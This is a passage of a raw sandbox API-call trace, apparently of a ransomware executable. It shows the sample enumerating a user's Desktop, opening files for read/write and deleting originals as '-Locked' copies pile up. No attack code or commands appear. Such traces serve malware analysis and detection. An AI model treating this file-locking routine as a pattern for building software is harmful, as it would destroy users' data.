lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked", lpFilePart=0x0) returned 0x53 [0311.388] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ujk4snw9z16p4ofdz.mp4-locked-locked")) returned 1 [0311.389] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0311.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.389] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\yzl8r176shb.swf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.390] GetFileType (hFile=0x480) returned 0x1 [0311.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.390] GetFileType (hFile=0x480) returned 0x1 [0311.393] CloseHandle (hObject=0x480) returned 1 [0311.393] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked", lpFilePart=0x0) returned 0x4d [0311.393] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\yzl8r176shb.swf-locked-locked")) returned 1 [0311.394] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5b [0311.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.394] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.394] GetFileType (hFile=0x480) returned 0x1 [0311.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.394] GetFileType (hFile=0x480) returned 0x1 [0311.396] CloseHandle (hObject=0x480) returned 1 [0311.396] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0311.396] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked-locked")) returned 0 [0311.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af210) returned 1 [0311.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0311.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0311.397] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", lpFindFileData=0x1aef38 | out: lpFindFileData=0x1aef38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39b3b3f8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.397] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.398] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39f9b77d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.398] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39f9b77d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.436] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392d69ca, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x392d69ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3a00805f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0311.437] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x393d1b6d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x393d1b6d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x393d1b6d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0311.437] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0311.438] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394f7e55, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x394f7e55, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x394f7e55, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0311.438] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39678739, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39678739, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39678739, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0311.438] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0311.439] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3981d31e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3981d31e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3981d31e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0311.439] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x398e9c82, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x398e9c82, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x398e9c82, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0311.439] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39aa04d4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39aa04d4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39aa04d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0311.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ca5881, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ca5881, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ca5881, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0311.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cbb7f2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cbb7f2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cbb7f2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0311.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ccc9c8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ccc9c8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ccc9c8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0311.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cdef13, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cdef13, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cdef13, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0311.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cf2779, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cf2779, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cf2779, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0311.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cfaf95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cfaf95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cfaf95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0311.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d7aed7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39d7aed7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39d7aed7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0311.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d898ac, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39d898ac, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39d898ac, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0311.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d98288, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39d98288, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39d98288, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0311.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39daa824, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39daa824, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39daa824, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0311.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39db92a4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39db92a4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39db92a4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0311.443] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39de780f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39de780f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39de780f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0311.443] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39df7661, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39df7661, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39df7661, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0311.443] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e04d24, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e04d24, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e04d24, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0311.444] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e137ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e137ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e137ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0311.444] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e271e7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e271e7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e271e7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0311.444] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e5437b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e5437b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e5437b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0311.445] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e8f876, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e8f876, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e8f876, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0311.445] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ead58a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ead58a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ead58a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0311.445] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39eecde0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39eecde0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39eecde0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0311.446] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39efdef6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39efdef6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39efdef6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0311.446] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f633cd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f633cd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f633cd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0311.446] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f86a90, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f86a90, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f86a90, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0311.446] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f86a90, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f86a90, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f86a90, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked-Locked", 